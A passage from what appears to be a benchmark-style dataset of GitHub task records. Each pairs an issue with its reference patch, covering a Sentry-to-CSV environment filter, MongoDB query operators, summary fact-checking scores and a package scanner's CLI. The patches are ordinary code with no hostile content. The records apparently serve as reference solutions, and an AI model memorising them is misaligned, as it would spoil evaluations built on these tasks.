Looking at the [docs for SVGFigure](https://svgutils.readthedocs.io/en/latest/transform.html#svgutils.transform.SVGFigure), a numeric value seems appropriate. I'm not sure what sort of object with a `.value` attribute is expected to fix our invocation, so currently I'm pinning 0.3.1.
Issue introduced in #27.
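The fix merged above uses EAFP-style duck typing instead of an isinstance check, so anything numeric (including the numpy scalar from the traceback) falls through cleanly. A minimal sketch of the pattern — the `Unit` and `Figure` names here are illustrative stand-ins, not svgutils' real classes:

```python
class Unit:
    """Stand-in for an object that carries its number in a .value attribute."""
    def __init__(self, value):
        self.value = value

class Figure:
    def __init__(self, width=None):
        self._width = 0
        if width:
            try:
                # width is a Unit-like object
                self._width = width.value
            except AttributeError:
                # plain int/float/str (numpy scalars land here too,
                # since they have no .value attribute)
                self._width = width
```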
| thanks for reporting, I am looking into it
| 2021-01-07T09:42:29 | 0.0 | [] | [] |
||
sparkmeter/sentry2csv | sparkmeter__sentry2csv-21 | 8b2b76992c01cc74a8f18fc8c86907afc9ec960c | diff --git a/sentry2csv/sentry2csv.py b/sentry2csv/sentry2csv.py
index 54c55ca..85213bd 100755
--- a/sentry2csv/sentry2csv.py
+++ b/sentry2csv/sentry2csv.py
@@ -27,6 +27,17 @@ def __init__(self, message): # pylint: disable=super-init-not-called
self.message = message
+@dataclass(frozen=True)
+class QueryParam:
+ """A key-value pair for the Sentry query string."""
+
+ field: str
+ value: str
+
+ def __repr__(self):
+ return f"{self.field}:{self.value}"
+
+
@dataclass
class Enrichment:
"""An enrichment."""
@@ -68,17 +79,25 @@ async def enrich_issue(
issue["_enrichments"][enrichment.csv_field] = ""
-async def fetch_issues(session: aiohttp.ClientSession, issues_url: str) -> List[Dict[str, Any]]:
+async def fetch_issues(
+ session: aiohttp.ClientSession, issues_url: str, query_params: List[QueryParam]
+) -> List[Dict[str, Any]]:
"""Fetch all issues from Sentry."""
page_count = 1
issues: List[Dict[str, Any]] = []
cursor = ""
+ query_str = " ".join(str(param) for param in query_params)
while True:
print(f"Fetching issues page {page_count}")
resp, links = await fetch(
- session, issues_url, params={"cursor": cursor, "statsPeriod": "", "query": "is:unresolved"}
+ session, issues_url, params={"cursor": cursor, "statsPeriod": "", "query": query_str}
)
logger.debug("Received page %s", resp)
+ if isinstance(resp, dict):
+ if "detail" in resp:
+ raise Sentry2CSVException(
+ f"Failed to query Sentry. Received unexpected response: {resp['detail']}"
+ )
assert isinstance(resp, list), f"Bad response type. Expected list, got {type(resp)}"
issues.extend(resp)
if links.get("next", cast(MultiDictProxy[Union[str, URL]], MultiDict())).get("results") != "true":
@@ -130,15 +149,20 @@ def write_csv(filename: str, issues: List[Dict[str, Any]]):
raise Sentry2CSVException("Unexpected API response. Run with -vv to debug.") from kerr
-async def export(
- token: str, organization: str, project: str, enrich: Optional[List[Enrichment]] = None, host: str = SENTRY_HOST
+async def export( # pylint:disable=too-many-arguments
+ token: str,
+ organization: str,
+ project: str,
+ query_params: List[QueryParam],
+ enrich: Optional[List[Enrichment]] = None,
+ host: str = SENTRY_HOST,
):
"""Export data from Sentry to CSV."""
enrichments: List[Enrichment] = enrich or []
issues_url = f"https://{host}/api/0/projects/{organization}/{project}/issues/"
async with aiohttp.ClientSession(headers={"Authorization": f"Bearer {token}"}) as session:
try:
- issues = await fetch_issues(session, issues_url)
+ issues = await fetch_issues(session, issues_url, query_params)
if enrichments:
print(f"Enriching {len(issues)} issues with event data...")
await asyncio.gather(
@@ -178,6 +202,13 @@ def main():
default=[SENTRY_HOST],
help=f"The Sentry host [default: {SENTRY_HOST}]",
)
+ parser.add_argument(
+ "--environment",
+ metavar="ENVIRONMENT_NAME",
+ nargs=1,
+ required=False,
+ help="The name of the environment to query",
+ )
parser.add_argument("organization", metavar="ORGANIZATION", nargs=1, help="The Sentry organization")
parser.add_argument("project", metavar="PROJECT", nargs=1, help="The Sentry project")
args = parser.parse_args()
@@ -188,9 +219,19 @@ def main():
else:
logger.setLevel(logging.WARNING)
enrichments = extract_enrichment(args.enrich)
+ query_params: List[QueryParam] = [QueryParam("is", "unresolved")]
+ if args.environment:
+ query_params.append(QueryParam("environment", args.environment[0]))
loop = asyncio.get_event_loop()
loop.run_until_complete(
- export(args.token[0], args.organization[0], args.project[0], enrich=enrichments, host=args.host[0])
+ export(
+ args.token[0],
+ args.organization[0],
+ args.project[0],
+ enrich=enrichments,
+ host=args.host[0],
+ query_params=query_params,
+ )
)
diff --git a/setup.py b/setup.py
index f975063..63ba7ca 100644
--- a/setup.py
+++ b/setup.py
@@ -61,7 +61,7 @@ def find_version(*file_paths):
"dev": [
"aioresponses==0.7.3",
"asynctest==0.13.0",
- "black==19.3b0",
+ "black==22.3.0",
"mypy==0.931",
"mypy-extensions==0.4.3",
"types-setuptools==57.4.9",
@@ -70,6 +70,7 @@ def find_version(*file_paths):
"pytest-asyncio==0.18.1",
"pytest-cov==2.8.1",
"pytest-mock==1.11.2",
+ "typing-extensions==4.2.0",
]
},
python_requires=">=3.7",
| Feature Request: fetch issues by environment
Is there a way to fetch issues from a certain environment?
| Hi, thanks for reaching out! You are correct - this cannot be done at the moment. However, this seems like a straightforward and reasonable thing for us to support.
For your use case, could you describe what your ideal input would be (e.g. an argument with a string), and whether or not you'd expect the environment name to be printed in the CSV output?
Ideally, my input should be `--environment production`, and the environment name need not be printed in the CSV output, unless my input is a regex. BTW, the CSV output should print the last event time of an issue. | 2022-05-24T20:08:02 | 0.0 | [] | [] |
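The query-string construction in the patch above joins `field:value` pairs with spaces (Sentry's search syntax); a self-contained sketch of that piece:

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class QueryParam:
    """A key-value pair for the Sentry search query string."""
    field: str
    value: str

    # dataclass skips generating __repr__ when the class defines its own
    def __repr__(self):
        return f"{self.field}:{self.value}"

def build_query(params):
    # Sentry's search syntax separates terms with spaces
    return " ".join(str(p) for p in params)

params = [QueryParam("is", "unresolved"), QueryParam("environment", "production")]
```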
||
codello/Motor-ODM | codello__Motor-ODM-24 | 968448e752d10129919b40a8cbb7a91a63ba96b7 | diff --git a/motor_odm/query.py b/motor_odm/query.py
index 67ef1f7..7d08585 100644
--- a/motor_odm/query.py
+++ b/motor_odm/query.py
@@ -47,6 +47,12 @@ def q(*args: Any, **kwargs: Any) -> "Query":
>>> q(age__gt=20, age__lt=100)
{'age': {'$gt': 20, '$lt': 100}}
+
+ Lastly you can combine queries with ``&``, ``|`` and ``^``. The ``^`` operator means
+ *nor* in this case.
+
+ >>> (q(age=20) & q(name="John")) | q(age=21)
+ {'$or': [{'$and': [{'age': 20}, {'name': 'John'}]}, {'age': 21}]}
"""
return Query(*args, **kwargs)
@@ -133,7 +139,7 @@ def __init__(self, *args: Any, **kwargs: Any) -> None:
self["_id"] = {"$in": ids}
self.extend(**kwargs)
- def extend(self, **kwargs: Any) -> None:
+ def extend(self, **kwargs: "DictStrAny") -> None:
"""Adds fields to this query.
This method adds the same keys and values that you would get using the :func:`q`
@@ -190,6 +196,24 @@ def comment(self, comment: str) -> "Query":
self["$comment"] = comment
return self
+ def __and__(self, other: dict) -> "Query":
+ assert isinstance(other, dict)
+ query = Query()
+ query.update({"$and": [self, other]})
+ return query
+
+ def __or__(self, other: dict) -> "Query":
+ assert isinstance(other, dict)
+ query = Query()
+ query.update({"$or": [self, other]})
+ return query
+
+ def __xor__(self, other: dict) -> "Query":
+ assert isinstance(other, dict)
+ query = Query()
+ query.update({"$nor": [self, other]})
+ return query
+
def _transform_op(op: Optional[str]) -> str:
"""Transforms an operator for MongoDB compatibility.
| Combined Queries
Queries should implement boolean operators using standard python syntax. Example:
```python
>>> q(name="name") & q(age=20)
{"$and": [{"name": "name"}, {"age": 20}]
```
| 2020-04-13T21:49:16 | 0.0 | [] | [] |
|||
Huffon/factsumm | Huffon__factsumm-16 | f79fd6ab98ecefbb99366deb819fba47f8dc9a56 | diff --git a/README.md b/README.md
index 21457f1..ec2dee4 100644
--- a/README.md
+++ b/README.md
@@ -16,13 +16,7 @@ So don't blame me, just take it as a concept project 👀
## Installation
-`FactSumm` requires *Java* to be installed in your environment to use **Stanford OpenIE**. With *Java* and *Python 3*, you can install `factsumm` simply using `pip`:
-
-```bash
-pip install factsumm
-```
-
-Or you can install it from source repository:
+`FactSumm` requires *Java* to be installed in your environment to use **Stanford OpenIE**. With *Java* and *Python 3*, you can install `FactSumm` from source repository:
```bash
git clone https://github.com/huffon/factsumm
@@ -39,7 +33,7 @@ pip install .
>>> factsumm = FactSumm()
>>> article = "Superman is a fictional superhero who first appeared in American comic books published by DC Comics. The character was created by writer Jerry Siegel and artist Joe Shuster, and first appeared in the comic book Action Comics #1. Superman has been adapted to a number of other media which includes radio serials, novels, movies, television shows and theatre. Although Superman was not the first superhero character, he popularized the superhero archetype and established its conventions. Superheroes are usually judged by how closely they resemble the standard set by Superman. He was the best-selling superhero character in American comic books up until the 1980s."
>>> summary = "Superman is a fictional superhero who first appeared in American comic books published by Marvel Comics. The character was created by writer Jerry Siegel and artist Joe Shuster. He popularized the superhero archetype and established its conventions. Superman has been adapted to a number of other media which includes radio serials, novels, movies, television shows and theatre."
->>> factsumm(article, summary)
+>>> factsumm(article, summary, verbose=True)
SOURCE Entities
1: [('Superman', 'PER'), ('American', 'MISC'), ('DC Comics', 'ORG')]
2: [('Jerry Siegel', 'PER'), ('Joe Shuster', 'PER'), ('Action Comics', 'MISC')]
@@ -56,58 +50,69 @@ SUMMARY Entities
SOURCE Facts
('American', 'per:alternate_names', 'Superman')
+('American', 'per:employee_of', 'DC Comics')
+('DC Comics', 'org:country_of_headquarters', 'American')
('Superman', 'per:employee_of', 'DC Comics')
('Superman', 'per:origin', 'American')
-('DC Comics', 'org:country_of_headquarters', 'American')
-('American', 'per:employee_of', 'DC Comics')
SUMMARY Facts
+('American', 'per:alternate_names', 'Superman')
+('Marvel Comics', 'org:country_of_headquarters', 'American')
('Superman', 'per:employee_of', 'Marvel Comics')
('American', 'per:employee_of', 'Marvel Comics')
-('Marvel Comics', 'org:country_of_headquarters', 'American')
-('American', 'per:alternate_names', 'Superman')
('Superman', 'per:origin', 'American')
COMMON Facts
-('Superman', 'per:origin', 'American')
('American', 'per:alternate_names', 'Superman')
+('Superman', 'per:origin', 'American')
DIFF Facts
-('American', 'per:employee_of', 'Marvel Comics')
('Marvel Comics', 'org:country_of_headquarters', 'American')
('Superman', 'per:employee_of', 'Marvel Comics')
+('American', 'per:employee_of', 'Marvel Comics')
-SOURCE Questions
-[Q] What is the name of the fictional superhero that first appeared in comic books? [A] Superman [Pred] Superman
-[Q] In what country did Superman first appear? [A] American [Pred] American
-[Q] What company published Superman comics? [A] DC Comics [Pred] DC Comics
-[Q] Who created the character? [A] Jerry Siegel [Pred] Jerry Siegel and artist Joe Shuster
-[Q] Who created the character of the 'Action Comics'? [A] Joe Shuster [Pred] <unanswerable>
-[Q] What comic book did the character first appear in? [A] Action Comics [Pred] Action Comics #1
-[Q] What superhero has been adapted to a number of other media? [A] Superman [Pred] Superman
-[Q] What was the name of the first superhero? [A] Superman [Pred] <unanswerable>
-[Q] Whose standard is a super hero compared to? [A] Superman [Pred] Superman
-[Q] What nationality was the character of the main character? [A] American [Pred] <unanswerable>
-
-SUMMARY Questions
-[Q] What is the name of the fictional superhero that first appeared in comic books? [A] Superman [Pred] Superman
-[Q] In what country did Superman first appear? [A] American [Pred] American
-[Q] What company published the first Superman comic book? [A] Marvel Comics [Pred] Marvel Comics
-[Q] Who created the character? [A] Jerry Siegel [Pred] Jerry Siegel and artist Joe Shuster
-[Q] Who created the character? [A] Joe Shuster [Pred] Jerry Siegel and artist Joe Shuster
-[Q] What superhero has been adapted to a number of other media? [A] Superman [Pred] Superman
-
-DIFF Questions
-[Q] What is the name of the fictional superhero that first appeared in comic books? [A] Superman [Pred] Superman
-[Q] In what country did Superman first appear? [A] American [Pred] American
-[Q] What company published Superman comics? [A] DC Comics [Pred] Marvel Comics
-[Q] Who created the character? [A] Jerry Siegel [Pred] Jerry Siegel and artist Joe Shuster
-[Q] Who created the character of the 'Action Comics'? [A] Joe Shuster [Pred] <unanswerable>
-[Q] What comic book did the character first appear in? [A] Action Comics [Pred] Marvel Comics
-[Q] What superhero has been adapted to a number of other media? [A] Superman [Pred] Superman
-[Q] What was the name of the first superhero? [A] Superman [Pred] Superman
-[Q] Whose standard is a super hero compared to? [A] Superman [Pred] conventions
-[Q] What nationality was the character of the main character? [A] American [Pred] American
+Fact Score: 0.4
+
+Answers based on SOURCE (Questions are generated from Summary)
+[Q] What is the name of the fictional superhero that first appeared in comic books? [Ent] Superman [Pred] Superman
+[Q] In what country did Superman first appear? [Ent] American [Pred] American
+[Q] What company published the first Superman comic book? [Ent] Marvel Comics [Pred] DC Comics
+[Q] Who created the character? [Ent] Jerry Siegel [Pred] Jerry Siegel and artist Joe Shuster
+[Q] Who created the character? [Ent] Joe Shuster [Pred] Jerry Siegel and artist Joe Shuster
+[Q] What superhero has been adapted to a number of other media? [Ent] Superman [Pred] Superman
+
+Answers based on SUMMARY (Questions are generated from Summary)
+[Q] What is the name of the fictional superhero that first appeared in comic books? [Ent] Superman [Pred] Superman
+[Q] In what country did Superman first appear? [Ent] American [Pred] American
+[Q] What company published the first Superman comic book? [Ent] Marvel Comics [Pred] Marvel Comics
+[Q] Who created the character? [Ent] Jerry Siegel [Pred] Jerry Siegel and artist Joe Shuster
+[Q] Who created the character? [Ent] Joe Shuster [Pred] Jerry Siegel and artist Joe Shuster
+[Q] What superhero has been adapted to a number of other media? [Ent] Superman [Pred] Superman
+
+QAGS Score: 0.9166666666666666
+
+SOURCE Triples
+('they', 'closely resemble', 'standard set')
+('He', 'was', 'best selling character')
+('He', 'was', 'best selling character in comic books up until 1980s')
+('He', 'was', 'superhero character in comic books up until 1980s')
+('Superman', 'is fictional superhero', 'appeared in books published by DC Comics')
+('he', 'established', 'its conventions')
+...
+
+SUMMARY Triples
+('Superman', 'is fictional superhero', 'first appeared in American books published by Marvel Comics')
+('Superman', 'is fictional superhero', 'first appeared in American comic books published by Marvel Comics')
+('He', 'established', 'its conventions')
+('Superman', 'is fictional superhero', 'first appeared in American books')
+('Superman', 'is fictional superhero', 'first appeared in American comic books published')
+...
+
+Triple Score: 0.6774193548387096
+
+Avg. ROUGE-1: 0.34586498627159923
+Avg. ROUGE-2: 0.24065908743388897
+Avg. ROUGE-L: 0.30456185003002245
```
<br>
@@ -118,15 +123,14 @@ From [here](https://arxiv.org/pdf/2104.14839.pdf), you can find various way to s
<br>
-### Triple-based Factual Consistency
+### Triple-based Module
-count the fact overlap between generated summary and the source document
-not combination, but permutation
+The triple-based module counts the overlap of fact triples between the generated summary and the source document.
<br>
-### QA-based Factual Consistency
+### QA-based Module

@@ -134,6 +138,22 @@ If you ask questions about the summary and the source document, you will get a s
<br>
+### OpenIE-based Module
+
+Stanford OpenIE can extract relationships from raw strings. But it's important to note that it's based on the open scheme, not the closed scheme (like `Triple-based Module`).
+
+For example, from `"Obama was born in Hawaii"`, OpenIE extracts (Obama, born in Hawaii). However, from `"Hawaii is the birthplace of Obama"`, it extracts (Hawaii, is the birthplace of, Obama). In common sense, the triples extracted from the two sentences should be identical, but OpenIE can't recognize that they are the same since it is based on an open scheme.
+
+So the score for this module may be unstable
+
+<br>
+
+### ROUGE-based Module
+
+Simple but effective word-level overlap ROUGE score
+
+<br>
+
## References
- [HuggingFace Transformers](https://github.com/huggingface/transformers)
@@ -141,3 +161,5 @@ If you ask questions about the summary and the source document, you will get a s
- [PySBD](https://github.com/nipunsadvilkar/pySBD)
- [The Factual Inconsistency Problem in Abstractive Text Summarization: A Survey](https://arxiv.org/abs/2104.14839.pdf)
- [Assessing The Factual Accuracy of Generated Text](https://arxiv.org/abs/1905.13322.pdf)
+- [Asking and Answering Questions to Evaluate the Factual Consistency of Summaries](https://arxiv.org/abs/2004.04228)
+- [FEQA: A Question Answering Evaluation Framework for Faithfulness Assessment in Abstractive Summarization](https://arxiv.org/abs/2005.03754)
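The `Triple Score` shown in the sample output above is the fraction of summary triples that also occur in the source; a minimal sketch of that computation, with illustrative triples:

```python
def triple_score(source_triples, summary_triples):
    # fraction of summary facts that also appear in the source
    common = summary_triples & source_triples
    return len(common) / len(summary_triples)

source = {("Superman", "per:employee_of", "DC Comics"),
          ("Superman", "per:origin", "American")}
summary = {("Superman", "per:employee_of", "Marvel Comics"),
           ("Superman", "per:origin", "American")}
```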
diff --git a/factsumm/__init__.py b/factsumm/__init__.py
index 65c8add..4e8682c 100644
--- a/factsumm/__init__.py
+++ b/factsumm/__init__.py
@@ -9,7 +9,7 @@
from factsumm.utils.level_entity import load_ie, load_ner, load_rel
from factsumm.utils.level_sentence import load_qa, load_qg
-from factsumm.utils.utils import Config
+from factsumm.utils.utils import Config, qags_score
os.environ["TOKENIZERS_PARALLELISM"] = "false"
logging.getLogger("transformers").setLevel(logging.ERROR)
@@ -35,33 +35,58 @@ def __init__(
self.qa = qa_model if qa_model is not None else self.config.QA_MODEL
self.ie = None
- def build_comb(
+ def build_perm(
self,
lines: List[str],
total_entities: Union[List[Dict], List[List[Dict]]],
):
- total_combs = list()
+ """
+ Build entity permutations for Relation Extraction
+
+ Args:
+ lines (List[str]): segmented document lines
+ total_entities (Union[List[Dict], List[List[Dict]]]): list of total entities
+
+ Returns:
+ List: list of permutations
+
+ """
+ total_perms = list()
for line, line_entities in zip(lines, total_entities):
- line_combs = list(permutations(line_entities, 2))
+ line_perms = list(permutations(line_entities, 2))
- line_combs = [{
+ line_perms = [{
"text":
line,
"spans": [
(comb[0]["start"], comb[0]["end"]),
(comb[-1]["start"], comb[-1]["end"]),
]
- } for comb in line_combs]
+ } for comb in line_perms]
- total_combs.append(line_combs)
+ total_perms.append(line_perms)
- return total_combs
+ return total_perms
def count_facts(self, lines: List[str], entities: List[List[Dict]]):
- combs = self.build_comb(lines, entities)
- triples = {self.rel(comb) for comb in combs}
- return triples
+ """[summary]
+
+ Args:
+ lines (List[str]): segmented document lines
+ entities (List[List[Dict]]): list of total entities
+
+ Returns:
+ Set: set of relation inferenced from permutations
+
+ """
+ perms = self.build_perm(lines, entities)
+ triples = list()
+
+ for perm in perms:
+ triples.extend(self.rel(perm))
+
+ return set(triples)
def _segment(self, text: str):
return [line.strip() for line in self.segmenter.segment(text)]
@@ -75,10 +100,36 @@ def _print_entities(self, mode: str, total_entities: List[List[Dict]]):
print()
def calculate_rouge(self, source: str, summary: str):
- rouge_1 = self.rouge.rouge_n(source, summary, 1)
- rouge_2 = self.rouge.rouge_n(source, summary, 2)
- rouge_l = self.rouge.rouge_l(source, summary)
- return rouge_1, rouge_2, rouge_l
+ """
+ Calculate ROUGE score
+
+ Args:
+ source (str): original source
+ summary (str): generated summary
+
+ Returns:
+ Tuple: (ROUGE-1, ROUGE-2, ROUGE-L) tuple
+
+ """
+ source_lines = self._segment(source)
+ num_lines = len(source_lines)
+
+ rouge_1 = 0.0
+ rouge_2 = 0.0
+ rouge_l = 0.0
+ for source_line in source_lines:
+ rouge_1 += self.rouge.rouge_n(summary, source_line, 1)
+ rouge_2 += self.rouge.rouge_n(summary, source_line, 2)
+ rouge_l += self.rouge.rouge_l(summary, source_line)
+
+ avg_rouge_1 = rouge_1 / num_lines
+ avg_rouge_2 = rouge_2 / num_lines
+ avg_rouge_l = rouge_l / num_lines
+
+ print(
+ f"Avg. ROUGE-1: {avg_rouge_1}\nAvg. ROUGE-2: {avg_rouge_2}\nAvg. ROUGE-L: {avg_rouge_l}"
+ )
+ return avg_rouge_1, avg_rouge_2, avg_rouge_l
def _print_facts(self, mode: str, facts: Set[Tuple]):
print(f"{mode.upper()} Facts")
@@ -86,7 +137,18 @@ def _print_facts(self, mode: str, facts: Set[Tuple]):
print(fact)
print()
- def extract_facts(self, source: str, summary: str):
+ def extract_facts(self, source: str, summary: str, verbose: bool = False):
+ """
+ Extract (head_entity, relation, tail_entity) relation triple using NER & RE module
+
+ See also https://arxiv.org/abs/1905.13322.pdf
+
+ Args:
+ source (str): original source
+ summary (str): generated summary
+ verbose (bool, optional): print verbose option. Defaults to False.
+
+ """
if isinstance(self.ner, str) and isinstance(self.rel, str):
self.ner = load_ner(self.ner)
self.rel = load_rel(self.rel)
@@ -98,9 +160,6 @@ def extract_facts(self, source: str, summary: str):
source_ents = self.ner(source_lines)
summary_ents = self.ner(summary_lines)
- self._print_entities("source", source_ents)
- self._print_entities("summary", summary_ents)
-
# extract entity-based triple: (head, relation, tail)
source_facts = self.count_facts(source_lines, source_ents)
summary_facts = self.count_facts(summary_lines, summary_ents)
@@ -108,18 +167,28 @@ def extract_facts(self, source: str, summary: str):
common_facts = summary_facts.intersection(source_facts)
diff_facts = summary_facts.difference(source_facts)
- self._print_facts("source", source_facts)
- self._print_facts("summary", summary_facts)
+ if verbose:
+ self._print_entities("source", source_ents)
+ self._print_entities("summary", summary_ents)
+
+ self._print_facts("source", source_facts)
+ self._print_facts("summary", summary_facts)
+
+ self._print_facts("common", common_facts)
+ self._print_facts("diff", diff_facts)
- self._print_facts("common", common_facts)
- self._print_facts("diff", diff_facts)
- return source_ents, summary_ents
+ fact_score = len(common_facts) / len(summary_facts)
+ print(f"Fact Score: {fact_score}")
+
+ return source_ents, summary_ents, fact_score
def _print_qas(self, mode: str, questions: List[Dict]):
- print(f"{mode.upper()} Questions")
+ print(
+ f"Answers based on {mode.upper()} (Questions are generated from Summary)"
+ )
for question in questions:
print(
- f"[Q] {question['question']}\t[A] {question['answer']}\t[Pred] {question['prediction']}"
+ f"[Q] {question['question']}\t[Ent] {question['answer']}\t[Pred] {question['prediction']}"
)
print()
@@ -129,7 +198,21 @@ def extract_qas(
summary: str,
source_ents: List = None,
summary_ents: List = None,
+ verbose: bool = False,
):
+ """
+ Extract Question & Answering Pair generated from Question Generation module
+
+ See also https://arxiv.org/abs/2004.04228
+
+ Args:
+ source (str): original source
+ summary (str): generated summary
+ source_ents (List, optional): named entities extracted from source. Defaults to None.
+ summary_ents (List, optional): named entities extracted from source. Defaults to None.
+ verbose (bool, optional): print verbose option. Defaults to False.
+
+ """
if isinstance(self.qg, str) and isinstance(self.qa, str):
self.qg = load_qg(self.qg)
self.qa = load_qa(self.qa)
@@ -146,28 +229,74 @@ def extract_qas(
if summary_ents is None:
summary_ents = self.ner(summary_lines)
- source_qas = self.qg(source_lines, source_ents)
summary_qas = self.qg(summary_lines, summary_ents)
- source_answers = self.qa(source, source_qas)
+ source_answers = self.qa(source, summary_qas)
summary_answers = self.qa(summary, summary_qas)
- diff_answers = self.qa(summary, source_qas)
- self._print_qas("source", source_answers)
- self._print_qas("summary", summary_answers)
- self._print_qas("diff", diff_answers)
+ if verbose:
+ self._print_qas("source", source_answers)
+ self._print_qas("summary", summary_answers)
- def extract_triples(self, source: str, summary: str):
- if self.ie is None:
- self.ie = load_ie()
+ qa_score = qags_score(source_answers, summary_answers)
+ print(f"QAGS Score: {qa_score}\n")
+
+ return qa_score
+
+ def _print_triples(self, mode: str, triples: Set):
+ print(f"{mode.upper()} Triples")
+ for triple in triples:
+ print(triple)
+ print()
+
+ def extract_triples(self, source: str, summary: str, verbose: bool = False):
+ """
+ Extract OpenIE based fact triples
- source_triples = self.ie(source)
- summary_triples = self.ie(summary)
+ Args:
+ source (str): original source
+ summary (str): generated summary
+ verbose (bool, optional): print verbose option. Defaults to False.
- print(source_triples)
- print(summary_triples)
+ """
+ if self.ie is None:
+ self.ie = load_ie()
- def __call__(self, source: str, summary: str):
- source_ents, summary_ents = self.extract_facts(source, summary)
- self.extract_qas(source, summary, source_ents, summary_ents)
- self.extract_triples(source, summary)
+ source_triples = {(
+ triple["subject"],
+ triple["relation"],
+ triple["object"],
+ ) for triple in self.ie(source)}
+
+ summary_triples = {(
+ triple["subject"],
+ triple["relation"],
+ triple["object"],
+ ) for triple in self.ie(summary)}
+
+ if verbose:
+ self._print_triples("source", source_triples)
+ self._print_triples("summary", summary_triples)
+
+ common_triples = summary_triples.intersection(source_triples)
+ triple_score = len(common_triples) / len(summary_triples)
+
+ print(f"Triple Score: {triple_score}\n")
+
+ return triple_score
+
+ def __call__(self, source: str, summary: str, verbose: bool = False):
+ source_ents, summary_ents, fact_score = self.extract_facts(
+ source,
+ summary,
+ verbose,
+ )
+ qags_score = self.extract_qas(
+ source,
+ summary,
+ source_ents,
+ summary_ents,
+ verbose,
+ )
+ triple_score = self.extract_triples(source, summary, verbose)
+ self.calculate_rouge(source, summary)
diff --git a/factsumm/utils/utils.py b/factsumm/utils/utils.py
index 389da54..3b38198 100644
--- a/factsumm/utils/utils.py
+++ b/factsumm/utils/utils.py
@@ -1,3 +1,6 @@
+import re
+import string
+from collections import Counter
from dataclasses import dataclass
from typing import Dict, List
@@ -115,6 +118,73 @@ def load_summarizer(model: str) -> object:
)
+def f1_score(gold_answer: str, pred_answer: str):
+ """
+ Calculate token-level F1 score
+
+ See also https://github.com/W4ngatang/qags/blob/master/qa_utils.py#L43
+
+ Args:
+ gold_answer (str): answer selected based on source document
+ pred_answer (str): answer selected based on generated summary
+
+ """
+
+ def normalize_answer(s):
+
+ def remove_articles(text):
+ return re.sub(r'\b(a|an|the)\b', ' ', text)
+
+ def white_space_fix(text):
+ return ' '.join(text.split())
+
+ def remove_punc(text):
+ exclude = set(string.punctuation)
+ return ''.join(ch for ch in text if ch not in exclude)
+
+ return white_space_fix(remove_articles(remove_punc(s.lower())))
+
+ gold_toks = normalize_answer(gold_answer).split()
+ pred_toks = normalize_answer(pred_answer).split()
+
+ common_toks = Counter(gold_toks) & Counter(pred_toks)
+
+ num_same_toks = sum(common_toks.values())
+
+ # If either is no-answer, then F1 is 1 if they agree, 0 otherwise
+ if gold_answer == "<unanswerable>" or pred_answer == "<unanswerable>":
+ return int(gold_answer == pred_answer)
+
+ if num_same_toks == 0:
+ return 0
+
+ precision = 1.0 * num_same_toks / len(pred_toks)
+ recall = 1.0 * num_same_toks / len(gold_toks)
+ f1 = (2 * precision * recall) / (precision + recall)
+ return f1
+
+
+def qags_score(source_answers: List, summary_answers: List):
+ """
+ Caculate QAGS Score
+
+ See also https://arxiv.org/abs/2004.04228
+
+ Args:
+ source_answers (List): source answers selected based on source document
+ summary_answers (List): summary answers selected based on generated summary
+
+ """
+ scores = list()
+
+ for source_answer, summary_answer in zip(source_answers, summary_answers):
+ source_answer = source_answer["prediction"]
+ summary_answer = summary_answer["prediction"]
+ scores.append(f1_score(source_answer, summary_answer))
+
+ return sum(scores) / len(scores)
+
+
if __name__ == "__main__":
model = "elastic/distilbert-base-cased-finetuned-conll03-english"
| Apply naive score method for QA and RE
| Apply threshold for filtering high-confident fact triple and QA pair to be scored | 2021-05-11T20:15:35 | 0.0 | [] | [] |
||
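The token-level F1 added in `factsumm/utils/utils.py` above can be exercised on its own. This condensed sketch reproduces the normalization and scoring from the patch (the `<unanswerable>` check is moved before tokenization, which does not change results); it is illustrative, not the package's exact code:

```python
import re
import string
from collections import Counter

def normalize_answer(s: str) -> str:
    """Lowercase, strip punctuation, drop articles, collapse whitespace."""
    s = "".join(ch for ch in s.lower() if ch not in set(string.punctuation))
    s = re.sub(r"\b(a|an|the)\b", " ", s)
    return " ".join(s.split())

def f1_score(gold_answer: str, pred_answer: str) -> float:
    """Token-level F1 between a gold and a predicted answer string."""
    # If either side is no-answer, F1 is 1 if they agree, 0 otherwise
    if gold_answer == "<unanswerable>" or pred_answer == "<unanswerable>":
        return float(gold_answer == pred_answer)
    gold_toks = normalize_answer(gold_answer).split()
    pred_toks = normalize_answer(pred_answer).split()
    num_same = sum((Counter(gold_toks) & Counter(pred_toks)).values())
    if num_same == 0:
        return 0.0
    precision = num_same / len(pred_toks)
    recall = num_same / len(gold_toks)
    return 2 * precision * recall / (precision + recall)

print(round(f1_score("the quick brown fox", "a quick fox"), 2))  # 0.8
```

`qags_score` in the patch is then just this F1 averaged over aligned source/summary answer pairs.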
DataDog/guarddog | DataDog__guarddog-426 | 8545867a71df48ce818039e9c8e8a48318db340b | diff --git a/README.md b/README.md
index c77b009b..49e84eeb 100644
--- a/README.md
+++ b/README.md
@@ -44,15 +44,11 @@ guarddog pypi scan requests --rules exec-base64 --rules code-execution
# Scan the 'requests' package using all rules but one
guarddog pypi scan requests --exclude-rules exec-base64
-# Scan a local package
+# Scan a local package archive
guarddog pypi scan /tmp/triage.tar.gz
-# Scan a local directory, the packages need to be located in the root directory
-# For instance you have several pypi packages in ./samples/ like:
-# ./samples/package1.tar.gz ./samples/package2.zip ./samples/package3.whl
-# FYI if a file not supported by guarddog is found you will get an error
-# Here is the command to scan a directory:
-guarddog pypi scan ./samples/
+# Scan a local package directory
+guarddog pypi scan /tmp/triage/
# Scan every package referenced in a requirements.txt file of a local folder
guarddog pypi verify workspace/guarddog/requirements.txt
diff --git a/guarddog/cli.py b/guarddog/cli.py
index e577d055..cacdf371 100644
--- a/guarddog/cli.py
+++ b/guarddog/cli.py
@@ -9,6 +9,7 @@
import logging
import os
import sys
+import tempfile
from typing import Optional, cast
import click
@@ -21,6 +22,7 @@
from guarddog.reporters.sarif import report_verify_sarif
from guarddog.scanners import get_scanner
from guarddog.scanners.scanner import PackageScanner
+from guarddog.utils.archives import safe_extract
EXIT_CODE_ISSUES_FOUND = 1
@@ -213,41 +215,30 @@ def _scan(
sys.stderr.write(f"Command scan is not supported for ecosystem {ecosystem}")
sys.exit(1)
- results = []
- if os.path.isdir(identifier):
- log.debug(f"Considering that '{identifier}' is a local directory")
- for package in os.listdir(identifier):
- result = scanner.scan_local(f"{identifier}/{package}", rule_param)
- result["package"] = package
- results.append(result)
- elif os.path.isfile(identifier):
- log.debug(f"Considering that '{identifier}' is a local file")
- result = scanner.scan_local(identifier, rule_param)
- result["package"] = identifier
- results.append(result)
- else:
- log.debug(f"Considering that '{identifier}' is a remote target")
- try:
